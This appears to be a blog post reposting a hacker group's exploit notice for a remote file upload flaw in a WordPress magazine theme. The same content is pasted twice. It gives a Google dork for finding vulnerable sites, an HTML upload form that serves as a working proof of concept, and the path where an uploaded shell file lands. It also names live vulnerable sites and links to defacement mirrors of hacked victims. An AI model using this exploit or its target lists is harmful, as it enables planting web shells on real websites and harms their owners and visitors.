Site : http://www.accesoriivin.ro/blog/wp-content/uploads/2014/08/
Site : www.mostargenclik.com/wp-content/uploads/2014/08/
Site : http://www.quemtava.com.br/wp-content/uploads/2014/08/mnh.html
Mirror : http://zone-hc.com/archive/mirror/75f3830_accesoriivin.ro_mirror_.html
Mirror : http://zone-hc.com/archive/mirror/46d324a_quemtava.com.br_mirror_.html
Here is Dork !
WordPress Project 10 Themes – Remote File Upload Vulnerability
(Hamzah Uygun & AnonGhost & All Members)
#################################################################################
#_________ .___ _______ ___. .__ #
#\_ ___ \ ____ __| _/____ \ \ ______ _ _\_ |__ |__| ____ #
#/ \ \/ / _ \ / __ |/ __ \ / | \_/ __ \ \/ \/ /| __ \| |/ __ \ #
#\ \___( <_> ) /_/ \ ___/ / | \ ___/\ / | \_\ \ \ ___/ #
# \______ /\____/\____ |\___ > \____|__ /\___ >\/\_/ |___ /__|\___ > #
# \/ \/ \/ \/ \/ \/ \/ #
#################################################################################
# Exploit Title: WordPress Project 10 Themes – Remote File Upload Vulnerability #
# Author: AnonGhost #
# Date: 11/18/2013 #
# Vendor Homepage: http://themeforest.net/ #
# Themes Link: http://themeforest.net/item/project-10-magazine-theme/2513938 #
# Price: $40 #
# Affected Version: v1.0 #
# Infected File: upload-handler.php #
# Category: webapps/php #
# Google dork: inurl:/wp-content/themes/project10-theme/ #
# Tested on : Windows/Linux #
#################################################################################
# Exploit & POC :
<form enctype="multipart/form-data"
action="http://localhost/wp-content/themes/project10-theme/functions/upload-handler.php" method="post">
Please choose a file: <input name="orange_themes" type="file" /><br />
<input type="submit" value="upload" />
</form>
# File path:
http://127.0.0.1/wordpress/wp-content/uploads/[year]/[month]/up.php
# Live Site:
-http://givethekXids.gr/give_v2/wp-content/themes/project10-theme//functions/upload-handler.php
-http://www.ba7Xar.org/wp-content/themes/project10-theme//functions/upload-handler.php
-http://www.ineeXdamilliondollars.com/wp-content/themes/project10-theme/functions/upload-handler.php
#
# My Account Facebook: https://www.facebook.com/hamzah.uyguna.nonyoums
# AnonGhost Page : https://www.facebook.com/AnonGhostOfficial2
# Website: http://www.anonghost.com
# Hamzah Uygun & AnonGhost Team
#################################################################################
Site : www.mostargenclik.com/wp-content/uploads/2014/08/
Site : http://www.quemtava.com.br/wp-content/uploads/2014/08/mnh.html
Mirror : http://zone-hc.com/archive/mirror/75f3830_accesoriivin.ro_mirror_.html
Mirror : http://zone-hc.com/archive/mirror/46d324a_quemtava.com.br_mirror_.html
Here is Dork !
WordPress Project 10 Themes – Remote File Upload Vulnerability
(Hamzah Uygun & AnonGhost & All Members)
#################################################################################
#_________ .___ _______ ___. .__ #
#\_ ___ \ ____ __| _/____ \ \ ______ _ _\_ |__ |__| ____ #
#/ \ \/ / _ \ / __ |/ __ \ / | \_/ __ \ \/ \/ /| __ \| |/ __ \ #
#\ \___( <_> ) /_/ \ ___/ / | \ ___/\ / | \_\ \ \ ___/ #
# \______ /\____/\____ |\___ > \____|__ /\___ >\/\_/ |___ /__|\___ > #
# \/ \/ \/ \/ \/ \/ \/ #
#################################################################################
# Exploit Title: WordPress Project 10 Themes – Remote File Upload Vulnerability #
# Author: AnonGhost #
# Date: 11/18/2013 #
# Vendor Homepage: http://themeforest.net/ #
# Themes Link: http://themeforest.net/item/project-10-magazine-theme/2513938 #
# Price: $40 #
# Affected Version: v1.0 #
# Infected File: upload-handler.php #
# Category: webapps/php #
# Google dork: inurl:/wp-content/themes/project10-theme/ #
# Tested on : Windows/Linux #
#################################################################################
# Exploit & POC :
<form enctype="multipart/form-data"
action="http://localhost/wp-content/themes/project10-theme/functions/upload-handler.php" method="post">
Please choose a file: <input name="orange_themes" type="file" /><br />
<input type="submit" value="upload" />
</form>
# File path:
http://127.0.0.1/wordpress/wp-content/uploads/[year]/[month]/up.php
# Live Site:
-http://givethekXids.gr/give_v2/wp-content/themes/project10-theme//functions/upload-handler.php
-http://www.ba7Xar.org/wp-content/themes/project10-theme//functions/upload-handler.php
-http://www.ineeXdamilliondollars.com/wp-content/themes/project10-theme/functions/upload-handler.php
#
# My Account Facebook: https://www.facebook.com/hamzah.uyguna.nonyoums
# AnonGhost Page : https://www.facebook.com/AnonGhostOfficial2
# Website: http://www.anonghost.com
# Hamzah Uygun & AnonGhost Team
#################################################################################
No comments:
Post a Comment